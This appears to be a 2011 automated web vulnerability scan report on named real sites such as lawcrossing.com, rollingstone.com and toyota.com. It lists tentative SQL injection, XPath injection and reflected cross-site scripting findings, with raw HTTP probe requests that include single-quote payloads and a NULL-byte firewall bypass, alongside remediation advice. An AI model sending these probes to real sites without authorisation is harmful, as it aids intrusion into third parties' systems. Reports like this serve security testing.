Domain Names with "crossing" that have XSS

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.edfed.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.edfed.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /?1%00'=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:58 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=j2smse82ucu5hpipl3grpjvjk4; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154420

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...
told me it would be! The monthly payment that they expected me to make was ridiculous! How could I, a recent grad, afford to make payments like that every month? I called to complain to them about the error on my account. They told me that the person th...<br>
...[SNIP]...

Request 2

GET /?1%00''=1 HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=l24gtaf6dhq2v58ea3g6mcl5b1; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154341

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...

1.2. http://www.lawcrossing.com/lcjssearchresults.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /lcjssearchresults.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=768gpl04fukvao3vkb03tcqct6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211210

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...
report, Hate Crime Statistics, that revealed a 25% increase of hate crimes against Latinos in just three short years. Interestingly (or maybe not), this coincided with the new and growing interest of illegal immigration from Mexico in the United States.
<br>
...[SNIP]...

Request 2

GET /lcjssearchresults.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:52 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukbkja300kfsovlq2ha0blbke4; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103002

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.3. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /salarysurvey/lcsalarysurvey.php' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hkesccpn53pmrddrmv4i22hhn0; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:31:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pl71ivi9iep0n3gtatr6dgnog5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:31:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.4. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

Request 1

GET /salarysurvey/lcsalarysurvey.php/1' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3019nb68albbrm8rj2qutsp212; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103077

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<td colspan="2" height="25" class="error" style="font-size:12px;">
...[SNIP]...

Request 2

GET /salarysurvey/lcsalarysurvey.php/1'' HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:30:18 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jieha937m8arnb548qci7an0j2; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:30:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103078

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.5. http://www.legalauthority.com/signup.php [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<br />Who says you can't find a needle in a haystack? With my Legal Authority mailing, I batted a thousand -- got one interview and one offer, and it was in entertainment law, which my Career Services Office said was almost impossible to break into!<br
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 57332

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1'300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56502

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
ct, I got an interview at a firm that I had never heard of before but does high-level trademark litigation. I was shocked. How could no one have known about this?!?!?! The salary they offered was also exceptional.

I owe my success to you, Legal Authority. Thank you!<br />
...[SNIP]...

Request 2

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1''300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.7. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.rollingstone.com
Path:	/music/albumreviews/low-country-blues-20110114

Issue detail

Request 1

GET /music'/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:18 GMT
Connection: close

Request 2

GET /music''/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...

1.8. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.rollingstone.com
Path:	/music/albumreviews/low-country-blues-20110114

Issue detail

Request 1

GET /music/albumreviews'/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /music/albumreviews''/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...

1.9. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.rollingstone.com
Path:	/music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/albumreviews/low-country-blues-20110114' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /music/albumreviews/low-country-blues-20110114'' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...

2. XPath injection previous next
There are 3 instances of this issue:

/js/global/global.js [REST URL parameter 1]
/js/global/global.js [REST URL parameter 2]
/js/global/global.js [REST URL parameter 3]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/js/global/global.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js'/global/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:45 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/js/global/global.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global'/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.toyota.com
Path:	/js/global/global.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global/global.js' HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:46 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

3. Cross-site scripting (reflected) previous next
There are 152 instances of this issue:

http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.aerospacecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.agriculturalcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.aharrisonbarnes.com/ [name of an arbitrarily supplied request parameter]
http://www.architecturecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.auditorcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.automotivecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.aviationcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.bcgsearch.com/searchresults.php [key parameter]
http://www.bcgsearch.com/searchresults.php [key parameter]
http://www.bcgsearch.com/searchresults.php [name of an arbitrarily supplied request parameter]
http://www.bilingualcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.biotechcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.bluecollarcrossing.com/ [name of an arbitrarily supplied request parameter]
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 2]
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx [REST URL parameter 3]
http://www.businessanalystcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.businessdevelopmentcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.callcentercrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.chefcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.civilengineeringcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.clevelcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.clinicalresearchcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.compliancecrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.computeraideddesigncrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.constructioncrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.consultingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.contractmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.counselingcrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.cpluspluscrossing.com/ [name of an arbitrarily supplied request parameter]
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 1]
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 2]
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 3]
http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal [REST URL parameter 4]
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 1]
http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 2]
